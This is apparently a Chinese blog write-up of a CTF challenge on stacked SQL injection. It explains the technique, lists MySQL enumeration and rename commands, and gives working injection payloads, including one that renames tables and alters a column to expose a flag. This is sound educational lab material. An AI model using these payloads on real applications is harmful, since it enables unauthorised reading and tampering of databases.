0x01 堆叠注入

1、定义与说明

• 在sql中，分号(;)表示一条sql语句的结束。在;结束之后继续构造下一条语句，会一起执行，因此为堆叠注入。
• union联合查询是将两条语句合并之后进行查询，union执行的语句有限。
• 堆叠注入可以执行任意的语句

2、查询语句

查询数据库：

• show databases

查询表：

• show tables

显示表中列的信息：

• show columns from table_name
• desc table_name
• select * from information_schema.columns where table_schema="" and table_name=""

更改表的名字：

• rename table table_name1 to newtable_name1 [, table_name2 to newtable_name2]
• alter table table_name to newtable_name

更改字段的名字：

• alter table table_name change name column_name varchar(20) not null

0x02

1、存在sql注入

GET，字符型，单引号

?inject=1' order by 2--+

select等一些语句被过滤

2、堆叠注入

?inject=1';show databases;--+

保证前面的语句闭合，执行后面的语句

得到了数据表

查看表的结构

只能查看words表，不能查看另一个表

重命名表

将words默认表重命名为word1，将数字表重命名为words

在words表插入一列，id，flag

那么我们查询id为1，得出flag

?inject=1' or 1=1; rename tables words to words1;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);--+

参考链接：

https://www.cnblogs.com/0nth3way/articles/7128189.html

https://www.cnblogs.com/dedragon/p/12728498.html

https://blog.csdn.net/qq_26406447/article/details/90643951

最新文章

1. 虚拟机安装CentOS6.3两个问题
2. 使用X-UA-Compatible来设置IE浏览器兼容模式
3. 学习笔记day5：inline inline-block block区别
4. C(++)基于websocket实时通信的实现—GoEasy
5. [工作积累] error: bad class file magic (cafebabe) or version (0033.0000)
6. WinForm中Component Class、User Control及Custom Control的区别和使用-转
7. linux 获取cpu百分比
8. Expedition（优先队列）
9. IX-Protected Dataplane Operating System解读
10. 2-Sat+输出可行解(个人模版)
11. codeforce 367dev2_c dp
12. 从YOLOv1到v3的进化之路
13. Centos7 安装Tomcat并运行程序
14. windows做代理服务器让内部linux上网
15. [STM32F103]RTC日历
16. 【html】前端实现筛选条件跳转
17. javascritp伪协议
18. linux vim 快捷键
19. 使用django发送邮件时的连接超时问题解决
20. 第六周的PSP

热门文章

1. [linux][mysql] 命令更改表结构：添加、删除、修改字段、调整字段顺序
2. Java IO 流 -- 转换流: InputStreamReader OutputStreamWriter
3. 哈希Hash定义
4. python学习14集合
5. Ubuntu 搜索文件
6. css之单位
7. 【集群实战】NFS网络文件共享服务2-mount挂载（参数，优化）
8. Eclipse Mac OS版 卸载svn插件subclipse
9. 理解CAS算法在JAVA中的作用
10. 「每天一道面试题」Java类的生命周期包括哪几个阶段？